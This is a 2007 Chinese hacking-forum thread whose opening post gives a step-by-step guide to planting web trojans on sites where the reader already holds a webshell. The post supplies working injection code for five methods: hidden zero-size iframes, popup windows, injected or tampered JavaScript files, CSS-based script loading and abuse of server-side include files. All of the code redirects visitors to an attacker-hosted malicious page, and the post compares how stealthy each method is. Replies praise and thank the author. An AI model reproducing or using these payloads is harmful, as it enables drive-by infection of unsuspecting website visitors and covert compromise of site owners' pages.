‹‹ 上一主题 | 下一主题 ››
发新话题
打印

如何挂马方法总结

绝版青春

青春散场

信息军队-上尉

岁月联盟-创始大神

宣传大使勋章 至尊贵宾勋章

1# 发表于 2007-1-26 19:43  只看该作者

如何挂马方法总结

在你得到一个站的webshell的时候,该如何挂马呢?一般我们采用下面几种方法。(http://68a6.68ab.com/jsjz.htm是我们的网马地址)

方法一:
把下面的代码
<html>
<iframe src="http://68a6.68ab.com/jsjz.htm" width="0" height="0" frameborder="0"></iframe>
<html>
插入到目标网页代码中,比如我们插入http://www.target.com/index.asp中,那么当有人浏览这个网页是,浏览器就会自动转向_blank>http://68a6.68ab.com/jsjz.htm 呵呵,也就中了我们的网马。
优点:实现简单   缺点:容易被管理员发现

方法二:
把下面的代码
<SCRIPT language=javascript>
window.open("http://68a6.68ab.com/jsjz.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
插入到http://www.target.com/index.asp中,那么当有人浏览这个页面时,会弹出http://68a6.68ab.com/jsjz.htm这个窗口,同时他也就中了我们的木马。注:width=1,height=1时,弹出的页面比较小,而width=0,height=0时就比较大了。
优点:代码比较隐蔽    缺点:容易被浏览者发觉(查看弹出窗口的源代码)

方法三:
也称为js挂马,有两种具体实现
1.
把代码
<script src="http://68a6.68ab/jsjz.js"></script>
挂到目标网页http://www.target.com/index.asp的代码里面,其中13lang.js的内容为
document.write("<iframe src='http://68a6.68ab.com/jsjz.htm' width=0 height=0 frameborder=0></iframe>")
注:jsjz.js和jsjz.htm在我们FTP空间的同一个目录下面(此例都为根目录下)
2.
如果目标网页http://www.target.com/index.asp代码中调用的有*.js文件(比如调用了gudu.js),那我们就把代码
document.write("<iframe src='http://68a6.68ab.com/jsjz.htm' width=0 height=0 frameborder=0></iframe>")
挂到gudu.js代码里面,这时,当别人浏览目标页面时同样会中马
拓展:例如,如果index.asp调用gudu.js,那我们就可以把13lang.js插入到gudu.js里面。
优点;隐蔽,实用,偶喜欢~!

方法四:
也称css挂马.把下面代码
<link href="http://68a6.68ab.com/jsjz.css" rel="stylesheet" type="text/css" />
插到目标网页index.asp代码中。其中jsjz.css的内容为:
body
{ background-image:url(javascript:document.write ("<script src="http://68a6.68ab.com/jsjz.js"></script>"))
}
其中jsjz.js的内容为
<script src="http://68a6.68ab.com/jsjz.htm"></script>
注:jsjz.css  jsjz.js  jsjz.htm在你的FTP空间的同一个目录里
拓展;可结合方法三,综合运用可衍生出很多具体实现
优点:隐蔽   缺点:麻烦

方法五:
运用<!--#include file="*.asp"-->
如果目标文件index.asp中包含<!--#include file="cainiao.asp"-->语句,那么我们可以在cainiao.asp中采用上述四种方

TOP

tianyaxin55

信息军队-上士
2# 发表于 2007-2-5 16:44  只看该作者
支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``支持 ~~~~~~~~~``

TOP

小地

信息军队-上士
3# 发表于 2007-4-10 14:39  只看该作者
强烈支持,

TOP

hackamy

電影院賣票的

信息军队-少尉
4# 发表于 2007-4-24 23:00  只看该作者
:(*^__^*) 嘻嘻……: 够经典的

TOP

cofan

信息军队-上等兵
5# 发表于 2007-4-25 11:12  只看该作者
很全面,收藏了

TOP

LiJun027

信息军队-列兵
6# 发表于 2007-4-25 21:56  只看该作者
css挂马没试过:(*^__^*) 嘻嘻……:

TOP

民工

信息军队-列兵
7# 发表于 2007-4-25 23:30  只看该作者
学习了。。。。。。。。。。。。。

TOP

kadis

信息军队-下士
8# 发表于 2007-5-14 06:18  只看该作者
又学到了东西~嘿嘿 :(*^__^*) 嘻嘻……: :(*^__^*) 嘻嘻……: :(*^__^*) 嘻嘻……:

TOP

sentry

信息军队-列兵
9# 发表于 2007-5-17 11:15  只看该作者
有新东西学了
呵呵

TOP

江湖飘一剑

信息军队-上士
10# 发表于 2007-5-19 20:40  只看该作者
哦,.

TOP

songzhixiong

信息军队-列兵
11# 发表于 2007-5-24 18:49  只看该作者
顶啊~~~~~~~~~`我爱死你了`~~~~~~~~~~~~~~:嘿嘿:

TOP

小D

信息军队-中士
12# 发表于 2007-12-31 21:08  只看该作者
爱死了 ,我正找这个呢,谢谢了

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题